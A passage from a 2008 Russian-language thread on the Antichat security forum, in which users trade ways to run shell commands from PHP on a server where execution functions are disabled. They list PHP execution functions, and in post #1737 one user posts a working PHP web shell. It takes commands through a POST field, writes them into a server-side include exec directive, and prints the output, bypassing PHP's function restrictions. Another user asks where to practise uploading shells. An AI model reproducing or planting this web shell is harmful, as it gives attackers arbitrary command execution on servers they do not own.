HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1731  
Старый 22.04.2008, 11:42
Lesnoy_chelovek
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме:
1536533

Репутация: 370
Отправить сообщение для Lesnoy_chelovek с помощью ICQ
По умолчанию

Для выполнения, насколько я помную, должены стоять с обоих сторон команды `` (обратный апостроф, находится там же где и тильда).
 
Ответить с цитированием

  #1732  
Старый 22.04.2008, 11:45
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191

Репутация: 48
По умолчанию

обратный апостроф это в перле =\
print `uname`
хотя может и в пшп есть, я хз

Ershik, ещё есть passthru, exec, shell_exec, popen

Последний раз редактировалось Спайдер; 22.04.2008 в 11:49..
 
Ответить с цитированием

  #1733  
Старый 22.04.2008, 11:47
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Цитата:
Сообщение от Спайдер  
обратный апостроф это в перле =\
print `uname`

Ershik, ещё есть passthru, exec, shell_exec, popen
врёте сударь=\
http://ru2.php.net/manual/ru/language.operators.execution.php

обратные ковычки равноценны shell_exec()

ещё есть pcntl_exec и proc_open
__________________
 
Ответить с цитированием

  #1734  
Старый 22.04.2008, 11:49
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191

Репутация: 48
По умолчанию

+toxa+, омг, я не успел отредактировать =)
на самом деле пшп я почти не знаю, вот и наврал)
 
Ответить с цитированием

  #1735  
Старый 22.04.2008, 12:13
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Все нужно по типу:
Цитата:
<?
system(proc_open);
?>
так и делал. Все запрещено..
 
Ответить с цитированием

  #1736  
Старый 22.04.2008, 14:54
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191

Репутация: 48
По умолчанию

омг
 
Ответить с цитированием

  #1737  
Старый 22.04.2008, 16:44
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

если можешь менять файл можешь через ccи попытатся
https://forum.antichat.ru/showpost.p...32&postcount=9

я написал себе этот маленкий шелл для этого
PHP код:
<?php
if ($handle = @fopen("./a.shtml"'w')) 
{ @
fwrite($handle'<!--#exec cmd="'.$_POST['a'].'"-->'); }
echo 
'<form name="a" method="post" action="">
<textarea name="textarea" id="textarea" cols="121" rows="24"> '
;
@include(
"http://".$_SERVER['HTTP_HOST'].rtrim(dirname($_SERVER['PHP_SELF']),'/\\')."/a.shtml") ;
echo 
' </textarea><input type="text" name="a" id="a"><input name="input" type="submit"></form> ';
?>

Последний раз редактировалось nicusor; 22.04.2008 в 17:03..
 
Ответить с цитированием

  #1738  
Старый 22.04.2008, 19:14
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Точнее можете расписать, что с этим делать? сси использовать как "перл"-файл?
Для начала я засунул скрипты себе на хостинг, вашим скриптом воспользоваться не могу.
 
Ответить с цитированием

  #1739  
Старый 22.04.2008, 21:59
Спайдер
Banned
Регистрация: 18.04.2008
Сообщений: 8
Провел на форуме:
65191

Репутация: 48
По умолчанию

омг! пиздец
выполни phpinfo() , найди поля disable functions и скопипасть сюда
 
Ответить с цитированием

  #1740  
Старый 22.04.2008, 22:14
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Народ, знает кто, где мона потренирвоаться с заливкой шеллов ? :Р
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ